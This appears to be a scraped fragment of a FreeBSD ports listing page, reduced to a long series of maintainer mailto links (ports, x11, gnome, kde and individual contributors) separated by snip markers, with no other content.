<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hemi@puresimplicity.net">hemi@puresimplicity.net</A>
...[SNIP]...
<A HREF="mailto:stephen@missouri.edu">stephen@missouri.edu</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gerrit.beine@gmx.de">gerrit.beine@gmx.de</A>
...[SNIP]...
<A HREF="mailto:idroxid01@yahoo.fr">idroxid01@yahoo.fr</A>
...[SNIP]...
<A HREF="mailto:lme@FreeBSD.org">lme@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fullermd@over-yonder.net">fullermd@over-yonder.net</A>
...[SNIP]...
<A HREF="mailto:kimelto@gmail.com">kimelto@gmail.com</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:marcus@FreeBSD.org">marcus@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:swell.k@gmail.com">swell.k@gmail.com</A>
...[SNIP]...
<A HREF="mailto:swell.k@gmail.com">swell.k@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lewiz@compsoc.man.ac.uk">lewiz@compsoc.man.ac.uk</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:matt@peterson.org">matt@peterson.org</A>
...[SNIP]...
<A HREF="mailto:sic_zer0@hotmail.com">sic_zer0@hotmail.com</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:schot@a-eskwadraat.nl">schot@a-eskwadraat.nl</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:msk@nullpointer.dk">msk@nullpointer.dk</A>
...[SNIP]...
<A HREF="mailto:amdmi3@FreeBSD.org">amdmi3@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:aragon@phat.za.net">aragon@phat.za.net</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:corky1951@comcast.net">corky1951@comcast.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:umeno@rr.iij4u.or.jp">umeno@rr.iij4u.or.jp</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chip-set@mail.ru">chip-set@mail.ru</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:antoine.brodin@laposte.net">antoine.brodin@laposte.net</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:domi@saargate.de">domi@saargate.de</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:marcus@FreeBSD.org">marcus@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:multimedia@FreeBSD.org">multimedia@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nork@FreeBSD.org">nork@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oleg@bsdpower.com">oleg@bsdpower.com</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:klammer@webonaut.com">klammer@webonaut.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dhn@FreeBSD.org">dhn@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:acm@FreeBSD.org">acm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vlad@vlad.uz.ua">vlad@vlad.uz.ua</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hrs@FreeBSD.org">hrs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nork@FreeBSD.org">nork@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:koma2@lovepeers.org">koma2@lovepeers.org</A>
...[SNIP]...
<A HREF="mailto:koma2@lovepeers.org">koma2@lovepeers.org</A>
...[SNIP]...
<A HREF="mailto:marius@nuenneri.ch">marius@nuenneri.ch</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:h.eichmann@gmx.de">h.eichmann@gmx.de</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:eimar.koort@gmail.com">eimar.koort@gmail.com</A>
...[SNIP]...
<A HREF="mailto:mwm@mired.org">mwm@mired.org</A>
...[SNIP]...
<A HREF="mailto:wxs@FreeBSD.org">wxs@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kmoore@FreeBSD.org">kmoore@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:markus@FreeBSD.org">markus@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ntarmos@cs.uoi.gr">ntarmos@cs.uoi.gr</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:freebsd-emulation@FreeBSD.org">freebsd-emulation@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kazu@jp.freebsd.org">kazu@jp.freebsd.org</A>
...[SNIP]...
<A HREF="mailto:kmoore@freebsd.org">kmoore@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:kmoore@freebsd.org">kmoore@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:kmoore@freebsd.org">kmoore@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:kmoore@FreeBSD.org">kmoore@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lme@FreeBSD.org">lme@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:maho@FreeBSD.org">maho@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:simon@olofsson.de">simon@olofsson.de</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:danfe@FreeBSD.org">danfe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rodrigo@bebik.net">rodrigo@bebik.net</A>
...[SNIP]...
<A HREF="mailto:itetcu@people.tecnik93.com">itetcu@people.tecnik93.com</A>
...[SNIP]...
<A HREF="mailto:citycat4@ngs.ru">citycat4@ngs.ru</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:spam@rm-rf.kiev.ua">spam@rm-rf.kiev.ua</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avg@icyb.net.ua">avg@icyb.net.ua</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:akosela@andykosela.com">akosela@andykosela.com</A>
...[SNIP]...
<A HREF="mailto:akosela@andykosela.com">akosela@andykosela.com</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oleg@bsdpower.com">oleg@bsdpower.com</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:doublef@tele-kom.ru">doublef@tele-kom.ru</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bland@FreeBSD.org">bland@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:henry.hu.sh@gmail.com">henry.hu.sh@gmail.com</A>
...[SNIP]...
<A HREF="mailto:bapt@FreeBSD.org">bapt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:kimelto@gmail.com">kimelto@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tom@hur.st">tom@hur.st</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vlad@vlad.uz.ua">vlad@vlad.uz.ua</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dsh@vlink.ru">dsh@vlink.ru</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:olivier@cochard.me">olivier@cochard.me</A>
...[SNIP]...
<A HREF="mailto:xride@FreeBSD.org">xride@FreeBSD.org</A>
